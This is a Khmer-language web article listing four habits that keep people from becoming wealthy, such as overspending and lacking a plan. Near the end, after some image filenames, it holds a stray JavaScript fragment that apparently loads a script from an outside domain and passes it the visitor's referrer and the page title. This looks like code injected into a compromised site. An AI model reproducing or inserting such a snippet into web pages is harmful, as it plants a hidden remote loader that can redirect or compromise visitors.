ក្តីសុបិន្តចង់ ក្លាយជាអ្នកមានទ្រព្យសម្បត្តិច្រើន ជារឿងដែលអ្នកគ្រប់គ្នាប្រាថ្នាចង់បាន

មានមូលហេតុជាច្រើន ដែលនាំឲ្យមនុស្សមិនអាច ក្លាយទៅជាអ្នកមាន។ ខាងក្រោមនេះ គឺជាចំណុចសំខាន់ៗមួយចំនួន ដែលអ្នកគួរតែជៀសវាង ប្រសិនបើចង់ក្លាយជាអ្នកមាន៖

១) ចាយច្រើនជាង ចំណូល៖ ទោះបីជាអ្នក រកចំណូលបានច្រើនប៉ុណ្ណាក៏ដោយ តែបើចាយច្រើនជាងចំណូលទៅហើយនោះ លទ្ធផលចុងក្រោយ គឺប្រាកដជាវេទនា។ ដូច្នេះហើយ អ្នកគួរតែគិតគូរឲ្យបានម៉ត់ចត់ រាល់ការចំណាយប្រចាំថ្ងៃ ដើម្បីប្រាកដថា អ្នកអាចសល់ប្រាក់កាសខ្លះដើម្បីសន្សំទុក។
២) ទិញរបស់ប្រើប្រាស់ដែលមិនមែនជាតម្រូវការ៖ អ្នកគួរទិញរបស់របរទាំងឡាយដែលចាំបាច់សម្រាប់សេចក្តីត្រូវការ និងមានប្រយោជន៍សម្រាប់ការប្រើប្រាស់ ជាជាងការទិញមក គ្រាន់តែដើម្បី បំពេញចំណង់របស់ខ្លួន ត្រូវដឹងថា អ្នកគ្មានថ្ងៃអាចបំពេញចំណង់របស់ខ្លួនបានគ្រប់ឡើយ តែបែរជាត្រូវចាយលុយច្រើនអត់ប្រយោជន៍ទៅវិញ។ បើមិនដឹង ឬមិនអាចបែងចែកអ្វីដែលសំខាន់បាននោះទេ ប្រាកដណាស់ ការចំណាយរបស់អ្នក គឺមិនចំខ្ទង់នោះទេ ឬអាចនិយាយបានម្យ៉ាងទៀតថា ចាយអត់ប្រយោជន៍។
៣) គ្មានគម្រោងច្បាស់លាស់៖ ការរៀបចំផែនការ ឬគម្រោង ពិតជាមានសារៈសំខាន់ខ្លាំងណាស់ ដើម្បីកំណត់ទិសដៅឲ្យច្បាស់ ថាអ្វីដែលអ្នកចង់សម្រេចនៅពេលខាងមុខ ហើយត្រូវប្រើយុទ្ធសាស្ត្រអ្វីខ្លះដើម្បីសម្រេចគោលដៅនោះ។ ដូច្នេះហើយ ដើម្បីក្លាយទៅជាអ្នកមានទ្រព្យសម្បតិ្តស្តុកស្តម្ភម្នាក់ ការរៀបចំគម្រោង ឬ ផែនការ គឺជារឿងដែលមិនអាចមើលរំលងឡើយ ។
៤) មិនព្យាយាមបង្កើនប្រាក់ចំណូលរបស់ខ្លួន៖ បើអ្នកមិនខិតខំរិះរកវិធី ដើម្បីបង្កើតប្រាក់ចំណូលឲ្យបានច្រើននោះទេ វាពិតជាពិបាកសម្រាប់ការក្លាយទៅជាអ្នកមាន។ ដូច្នេះ ត្រូវរកឱកាស ហើយប្រសិនបើមិនមានឱកាស គឺត្រូវតែចេះបង្កើតឱកាសដោយខ្លួនឯង ដើម្បីអាចមានប្រាក់ចំណូលច្រើនឡើងៗ៕

13880296_622719284561654_7658894971286009967_n 13886284_622801957886720_8888740819446720599_n 13912817_622719364561646_6345339310369321870_ns.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More